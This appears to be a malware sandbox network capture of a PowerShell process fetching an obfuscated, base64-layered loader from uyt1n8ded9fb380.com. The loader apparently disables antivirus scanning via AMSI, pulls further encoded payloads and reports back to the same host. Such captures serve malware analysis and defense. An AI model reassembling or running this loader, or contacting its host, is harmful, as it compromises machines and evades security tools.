                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:


                                                                                                                          HTTPS Proxied Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.11.3049728172.67.137.624437944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:08 UTC165OUTGET /D HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-11-08 09:58:09 UTC985INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:09 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 6465
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RBhLnerGmwA2bv2VuJmguyYwYvpTQK3CimAoinmXNWNcKYdndOS4nAZpQnB7v%2Bq%2FdCflxVbtjEZ1tljBbToqXckhe2dVgrxaGQCNJhxjPshArveZYxQOqas4FyqYz%2BpIfhY5C0Ugr6zl"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=23493&sent=11203&recv=5567&lost=0&retrans=0&sent_bytes=15722805&recv_bytes=80455&delivery_rate=8423076&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b3f0ffcd7c96-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102439&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=779&delivery_rate=37322&cwnd=252&unsent_bytes=0&cid=6e1e7e4e5da4123a&ts=841&x=0"
                                                                                                                          2024-11-08 09:58:09 UTC384INData Raw: 24 73 6a 6f 6f 70 65 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 6a 42 4a 4e 30 52 52 62 32 74 5a 65 55 45 35 53 55 5a 30 52 6d 4a 75 57 6e 42 6a 62 54 6c 31 59 6c 64 57 64 57 52 47 4d 44 5a 50 62 45 4a 35 59 6a 4a 4f 62 47 4d 7a 54 6e 5a 6a 61 30 35 32 5a 46 63 31 4d 45 39 33 4d 45 74 4b 52 31 46 6e 55 46 4e 42 62 31 49 79 56 6a 42 4d 56 6b 4a 35 59 6a 4a 4f 62 47 4d 7a 54 57 64 6d 51 30 4a 4f 57 6c 64 47 65 6d 52 59 53 6d 78 4d 56 54 6c 70 59 57 31 57 61 6d 52 44 61 33 56 52 4d 6a 6b 78 59 6d 35 52 4e 30 52 52 62 32 74 61 55 30 45 35 53 55 5a 30 56 47 56 59 54 6a 42
                                                                                                                          Data Ascii: $sjoope=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("UjBJN0RRb2tZeUE5SUZ0RmJuWnBjbTl1YldWdWRGMDZPbEJ5YjJObGMzTnZja052ZFc1ME93MEtKR1FnUFNBb1IyVjBMVkJ5YjJObGMzTWdmQ0JOWldGemRYSmxMVTlpYW1WamRDa3VRMjkxYm5RN0RRb2taU0E5SUZ0VGVYTjB
                                                                                                                          2024-11-08 09:58:09 UTC1369INData Raw: 56 7a 51 30 57 6b 64 57 61 30 39 58 57 6d 6c 4e 65 6d 64 33 54 47 31 4f 64 6d 4a 54 4f 57 31 68 56 33 68 73 54 58 6b 34 64 31 70 55 5a 33 70 4e 65 6c 4a 73 54 57 70 6a 4d 30 31 36 51 6d 31 4f 61 6c 6b 77 54 6b 52 4a 4d 6b 31 55 56 58 6c 4f 65 6c 70 71 57 6b 52 73 61 55 31 74 57 6d 70 50 52 30 35 74 54 6c 64 56 4d 6c 6c 55 53 54 42 4e 65 6d 4d 79 57 58 70 6b 61 31 6c 36 55 54 4a 50 52 31 6b 7a 54 31 52 72 4e 46 70 45 51 54 4e 4e 56 46 46 33 54 6b 52 6e 64 31 70 71 56 54 4a 4e 52 45 46 33 54 58 70 52 65 45 31 58 56 54 46 5a 65 6b 70 73 57 6b 64 47 62 55 35 58 55 54 52 4f 56 31 45 7a 54 6c 52 43 61 6b 31 45 56 54 4a 4f 56 47 78 6f 54 57 31 4b 62 45 35 36 57 58 68 4f 61 6c 55 78 54 6e 70 6e 64 30 35 48 56 58 64 5a 62 56 70 71 54 31 52 61 61 31 70 45 52 54 4e
                                                                                                                          Data Ascii: VzQ0WkdWa09XWmlNemd3TG1OdmJTOW1hV3hsTXk4d1pUZ3pNelJsTWpjM016Qm1OalkwTkRJMk1UVXlOelpqWkRsaU1tWmpPR05tTldVMllUSTBNemMyWXpka1l6UTJPR1kzT1RrNFpEQTNNVFF3TkRnd1pqVTJNREF3TXpReE1XVTFZekpsWkdGbU5XUTROV1EzTlRCak1EVTJOVGxoTW1KbE56WXhOalUxTnpnd05HVXdZbVpqT1Raa1pERTN
                                                                                                                          2024-11-08 09:58:09 UTC1369INData Raw: 32 39 4c 52 57 52 73 5a 45 4d 78 57 47 4a 58 62 46 42 5a 62 58 42 73 57 54 4e 52 5a 30 78 56 4e 57 68 69 56 31 5a 36 59 30 64 47 61 6c 70 54 51 57 6c 6a 62 54 6c 32 5a 45 5a 34 56 46 70 58 54 6a 46 6a 62 57 77 77 5a 56 56 4f 62 47 4a 75 55 6d 78 6a 61 6b 6c 70 53 55 4d 78 55 6d 52 58 56 6e 6c 6c 55 30 46 70 56 54 42 57 54 56 4a 56 54 6c 56 4a 51 32 39 6e 55 6d 78 4b 55 46 52 54 51 6b 4a 69 62 6c 4a 77 5a 47 31 73 65 57 52 59 54 6c 46 6a 62 54 6c 72 5a 46 64 4f 4d 45 6c 70 51 6a 68 4a 52 6b 35 73 59 6b 64 57 61 6d 52 44 4d 56 42 5a 62 58 42 73 57 54 4e 52 5a 30 78 56 56 6a 52 6a 52 30 5a 31 57 6b 5a 43 65 57 49 7a 51 6d 78 6a 62 6c 49 31 53 55 64 53 63 47 4d 7a 51 6e 4e 5a 57 47 78 50 57 56 63 78 62 45 74 54 51 58 52 68 62 54 6c 77 59 6d 6c 42 61 55 78 44
                                                                                                                          Data Ascii: 29LRWRsZEMxWGJXbFBZbXBsWTNRZ0xVNWhiV1Z6Y0dGalpTQWljbTl2ZEZ4VFpXTjFjbWwwZVVObGJuUmxjaklpSUMxUmRXVnllU0FpVTBWTVJVTlVJQ29nUmxKUFRTQkJiblJwZG1seWRYTlFjbTlrZFdOMElpQjhJRk5sYkdWamRDMVBZbXBsWTNRZ0xVVjRjR0Z1WkZCeWIzQmxjblI1SUdScGMzQnNZWGxPWVcxbEtTQXRhbTlwYmlBaUxD
                                                                                                                          2024-11-08 09:58:09 UTC1369INData Raw: 35 54 47 31 53 63 32 4a 44 53 58 42 59 55 30 4a 33 5a 46 64 4b 63 32 46 58 54 57 64 6a 4d 31 4a 6f 5a 45 64 73 61 6b 6c 48 56 6a 52 6b 52 31 5a 35 59 6d 6c 43 63 47 4a 75 55 57 64 56 4d 6d 68 32 5a 44 46 6b 63 47 4a 74 55 6e 5a 6b 65 57 68 4b 59 6d 35 53 55 57 52 49 53 57 64 68 52 6d 52 31 57 6b 4e 33 5a 32 46 58 22 29 29 3b 0a 24 74 61 77 71 75 70 62 6a 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 79 78 54 64 47 46 30 61 57 4d 3d 22 29 29 3b 0a 24 66 6c 68 79 6f 79 6c 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74
                                                                                                                          Data Ascii: 5TG1Sc2JDSXBYU0J3ZFdKc2FXTWdjM1JoZEdsaklHVjRkR1Z5YmlCcGJuUWdVMmh2ZDFkcGJtUnZkeWhKYm5SUWRISWdhRmR1WkN3Z2FX"));$tawqupbj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YyxTdGF0aWM="));$flhyoyl=[System.Text.Encoding]::ASCII.Get
                                                                                                                          2024-11-08 09:58:09 UTC516INData Raw: 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 33 6c 7a 64 41 3d 3d 22 29 29 3b 0a 24 63 64 71 63 6b 73 62 78 6f 78 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 62 53 35 44 62 33 4a 6c 22 29 29 3b 0a 24 62 6d 66 66 67 79 72 73 69 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 33 6c 7a 64 47 55 3d 22 29 29 3b 0a 24 77 67 62 6b 6a 62 79 6f
                                                                                                                          Data Ascii: tem.Convert]::FromBase64String("U3lzdA=="));$cdqcksbxox=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bS5Db3Jl"));$bmffgyrsi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGU="));$wgbkjbyo
                                                                                                                          2024-11-08 09:58:09 UTC1369INData Raw: 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 62 58 4e 70 53 57 35 70 64 45 5a 68 61 57 78 6c 5a 41 3d 3d 22 29 29 3b 0a 24 6b 75 65 7a 66 62 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 51 3d 3d 22 29 29 3b 0a 24 75 6a 67 70 69 72 66 7a 6d 6d 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 5a 57 30 75 54 57 46 75 59 57 64 6c 62 57 56 75 64 43 35 42 64 58 52 76 62 57
                                                                                                                          Data Ascii: rt]::FromBase64String("bXNpSW5pdEZhaWxlZA=="));$kuezfb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YQ=="));$ujgpirfzmm=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZW0uTWFuYWdlbWVudC5BdXRvbW
                                                                                                                          2024-11-08 09:58:09 UTC89INData Raw: 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 28 24 63 73 62 79 75 65 6f 74 6d 20 2b 20 24 73 6a 6f 6f 70 65 29 29 29 29 3b 0a
                                                                                                                          Data Ascii: Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($csbyueotm + $sjoope))));


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.11.3049729172.67.137.624437944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:11 UTC374OUTGET /file3/0e8334e27730f66442615276cd9b2fc8cf5e6a24376c7dc468f7998d07140480f560003411e5c2edaf5d85d750c05659a2be7616557804e0bfc96dd179470fe4c278171f9e81e55643e7a125dc57e9656a5ad8c0cfb4383d01580a4ada31faea/Windows%20Defender/16/16/user/182 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          2024-11-08 09:58:11 UTC1063INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:11 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 2886
                                                                                                                          Connection: close
                                                                                                                          content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9ajyAzJmqi6uyMSLAbEhVqwAsqT8Bua3Jyh7hYJPvPj90Uj%2B1B6T6Ch11tyQDjhL1aY%2BN%2B%2BqhqmuVpzBLkHMKBuX8Qm%2BwQt9bgZT51sYgeDy3tDiv8tF3gSm0B5c6EWOwutxgHh9MWh"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1725&sent=11442&recv=5676&lost=0&retrans=1&sent_bytes=16213705&recv_bytes=39124&delivery_rate=14784810&cwnd=266&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b4004a504259-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102117&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1012&delivery_rate=37468&cwnd=227&unsent_bytes=0&cid=0261affbeaa58e76&ts=832&x=0"
                                                                                                                          2024-11-08 09:58:11 UTC306INData Raw: 25 63 7b 77 6c 67 66 6a 76 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 58 7b 4f 4e 60 47 6e 78 57 6f 71 4b 53 45 43 6f 54 54 4f 6f 62 44 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 52 62 33 48 78 5b 44 34 60 56 44 34 37 56 57 65 6a 63 46 4f 34 50 59 4b 50 54 31 47 73 58 7b 4f 52 64 56 47 59 4f 56 34 53 63 55 6d 73 5b 57 53 7b 55 6a 4f 71 50 56 65 4b 50 31 47 73 58 6a 62 34 63 6d 53 59 57 6f 71 6b 4c 6a 5b 74 56 6d 69 4f 5b 31 75 37 4c 46 65 4b 60 55 43 31 55 47 4c 76 65 44 79 55 4c 49 53 4c 54 7b 43 71 55 32 62 76 52 31 53 53 63 33 65 4b 50 31 47 6f 52 6a 65 6e 63 47 6d 59 54
                                                                                                                          Data Ascii: %c{wlgfjv<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#X{ON`GnxWoqKSECoTTOobD82LDuKP1GoRTORb3Hx[D4`VD47VWejcFO4PYKPT1GsX{ORdVGYOV4ScUms[WS{UjOqPVeKP1GsXjb4cmSYWoqkLj[tVmiO[1u7LFeK`UC1UGLveDyULISLT{CqU2bvR1SSc3eKP1GoRjencGmYT
                                                                                                                          2024-11-08 09:58:11 UTC1369INData Raw: 57 7b 54 76 55 47 5b 52 4f 56 4f 49 57 56 6d 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6b 4b 5b 57 32 66 79 56 6d 4f 43 4e 54 6d 45 52 6c 69 6b 52 44 4b 7b 58 57 65 4e 60 46 53 49 63 49 5b 68 60 55 6d 79 58 7b 48 34 65 54 6d 70 62 31 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6c 38 60 57 31 5b 73 56 6d 69 4a 64 6d 65 34 54 6f 4b 60 56 46 79 6a 52 54 50 76 5b 31 71 48 56 6c 69 68 52 47 5b 72 55 32 62 76 52 31 6d 45 50 56 65 4b 50 30 48 79 58 33 30 73 5b 30 43 55 50 56 6d 69 52 47 48 76 58 31 69 4f 4f 6a 79 34 4e 55 47 6d 56 47 47 35 58 6c 71 6e 60 30 71 59 54 55 57 60 63 54 6d 37 55 31 53 43 65 57 6a 78 4e 59 53 4c 4c 6d 44 7b 55 6d 53 47 64 54 30 37 52 55 47 4f 4c 6d 5b 72 55 30 53 73 64 44 34 54 56 55 43 4f 53 30 57 34 56 6a 53 4e 63 54 34 75 57 55 57
                                                                                                                          Data Ascii: W{TvUG[ROVOIWVmQe{CMRTOC[1mETkK[W2fyVmOCNTmERlikRDK{XWeN`FSIcI[h`UmyX{H4eTmpb14E[{CMRTOC[1mETl8`W1[sVmiJdme4ToK`VFyjRTPv[1qHVlihRG[rU2bvR1mEPVeKP0HyX30s[0CUPVmiRGHvX1iOOjy4NUGmVGG5Xlqn`0qYTUW`cTm7U1SCeWjxNYSLLmD{UmSGdT07RUGOLm[rU0SsdD4TVUCOS0W4VjSNcT4uWUW
                                                                                                                          2024-11-08 09:58:11 UTC1211INData Raw: 47 71 57 53 6f 6d 6b 63 54 58 30 52 30 4f 73 4f 31 53 53 63 31 71 45 57 31 71 34 56 6d 65 46 62 6a 38 32 4c 44 75 45 56 45 43 4e 50 33 65 72 60 6d 6d 58 54 6c 71 69 50 55 43 4d 50 30 69 7b 55 6a 4f 6f 60 31 71 57 4c 6d 5b 30 56 6a 4f 43 60 30 69 34 4f 54 5b 6d 53 31 34 72 58 31 69 52 62 46 48 78 4f 49 57 54 57 30 5b 37 58 7b 4b 46 63 6d 71 54 62 31 34 45 5b 33 75 4a 52 6a 65 4e 65 6c 53 59 4f 55 43 4b 50 7b 40 34 52 54 53 47 4f 31 53 53 63 31 71 45 57 6a 35 76 56 57 69 4a 4c 44 79 56 55 6f 4f 60 57 30 5b 32 52 54 4c 79 64 6a 6d 44 53 55 47 51 65 7b 43 4d 50 30 66 76 55 6a 4f 74 4c 44 34 45 5b 7b 43 4d 53 47 47 77 51 50 3c 3c 23 28 28 3a 0b 25 68 75 63 65 6d 73 75 64 71 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48
                                                                                                                          Data Ascii: GqWSomkcTX0R0OsO1SSc1qEW1q4VmeFbj82LDuEVECNP3er`mmXTlqiPUCMP0i{UjOo`1qWLm[0VjOC`0i4OT[mS14rX1iRbFHxOIWTW0[7X{KFcmqTb14E[3uJRjeNelSYOUCKP{@4RTSGO1SSc1qEWj5vVWiJLDyVUoO`W0[2RTLydjmDSUGQe{CMP0fvUjOtLD4E[{CMSGGwQP<<#((:%hucemsudq<ZRxrudl/Udyu/Dobnehof\;;@RBH


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.11.3049730172.67.137.624437944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:12 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211874eaf2d7bf53485b09f44dc9fdc79407 HTTP/1.1
                                                                                                                          Content-Type: application/json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Content-Length: 308
                                                                                                                          2024-11-08 09:58:12 UTC308OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 75 79 74 31 6e 38 64 65 64 39 66 62 33 38 30 2e 63 6f 6d 2f 66 69 6c 65 32 2f 39 33 66 33 36 65 38 31 31 65 38 37 34 62 37 38 30 30 35 62 38 32 31 65 64 39 34 35 36 37 30 32 38 65 66 64 34 61 66 36 33 37 34 34 65 64 66 35 39 61 65 31 30 65 61 36 30 31 34 65 34 39 33 66 31 31 66 30 33 63 37 63 37 33 65 30 64 64 63 37 36 36 63 64 36 65 33 33 63 31 36 39 62 61 34 61 64 66 37 33 31 61 61 62 34 35 61 33 62 65 66 30 63 32 62 61 61 35 35 62 62 34 39 36 39 65 34 62 35 33 35 66 35 64 30 63 34 36 66 31 32 33 66 65 39 39 32 37 38 30 36 64 32 33 38 38 61 31 65 35 66 38 65 65 65 65 35 32 61 31 64 63 64 39 38 36 65 38 30 61 35 34 36 34 36 64 38 38 38 66 35 33 65 31 32 63
                                                                                                                          Data Ascii: [ "\"begin download https://uyt1n8ded9fb380.com/file2/93f36e811e874b78005b821ed94567028efd4af63744edf59ae10ea6014e493f11f03c7c73e0ddc766cd6e33c169ba4adf731aab45a3bef0c2baa55bb4969e4b535f5d0c46f123fe9927806d2388a1e5f8eeee52a1dcd986e80a54646d888f53e12c
                                                                                                                          2024-11-08 09:58:13 UTC943INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:13 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUjyyF0yrDGNff2uKpuYSyqvc2oqM8aN0kfi6QIEBvAkR4SXMO9wSCFoOe1umG5O%2Bf5jTICMju9tqOvccE7GYh5ZSzlUUS3eoT%2FFbsrzPdgkDeLXubqQn5Du%2FS7QmlmnaMivMQ3p4Dpq"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1579&sent=11452&recv=5688&lost=0&retrans=1&sent_bytes=16218361&recv_bytes=47605&delivery_rate=14784810&cwnd=268&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b407ea04c459-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102067&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1258&delivery_rate=37450&cwnd=231&unsent_bytes=0&cid=f1a81a8760323287&ts=856&x=0"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.11.3049731172.67.137.624437944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:13 UTC370OUTGET /file2/93f36e811e874b78005b821ed94567028efd4af63744edf59ae10ea6014e493f11f03c7c73e0ddc766cd6e33c169ba4adf731aab45a3bef0c2baa55bb4969e4b535f5d0c46f123fe9927806d2388a1e5f8eeee52a1dcd986e80a54646d888f53e12cce2b10ff81035b88a1bba0cb3f04 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          2024-11-08 09:58:14 UTC1061INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:14 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 2874
                                                                                                                          Connection: close
                                                                                                                          content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KbENO%2Fu2oyrNYY0Rppo7hBVjKx42leTCt0xtbrQRFwLV1ywq7%2Fl4HcnGfjydoBJ8pDTBOqz7PSNmRRZoV1Xcm%2BeRbM0eJtSw7CcdCuBp31Weh4bcandL5L9pDNmVhW%2BNPMITT7UqBLtP"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6796&sent=11462&recv=5698&lost=0&retrans=1&sent_bytes=16220927&recv_bytes=52966&delivery_rate=14784810&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b40edd6242ce-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102133&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1008&delivery_rate=37447&cwnd=251&unsent_bytes=0&cid=f2ba7bf868077f17&ts=813&x=0"
                                                                                                                          2024-11-08 09:58:14 UTC308INData Raw: 25 6a 6c 63 7b 62 6e 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 52 6a 65 31 63 46 57 55 50 55 6d 4b 50 31 71 44 58 6b 48 30 4c 47 71 59 4f 55 43 4c 57 6d 48 30 58 31 65 57 60 54 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 52 4c 6d 6d 59 64 45 47 60 54 31 44 34 52 54 4f 4a 60 46 4f 48 50 6f 4f 69 57 31 34 6e 5b 44 65 72 65 6c 4b 71 4e 59 47 6b 4c 6b 6d 30 52 56 71 7b 55 6a 4f 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 52 63 30 71 59 53 6c 75 60 56 44 71 37 57 32 6d 52 62 6d 71 58 63 46 53 4b 53 45 43 6f 52 6a 69 60 60 46 4b 48 57 6c 79 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6b 47
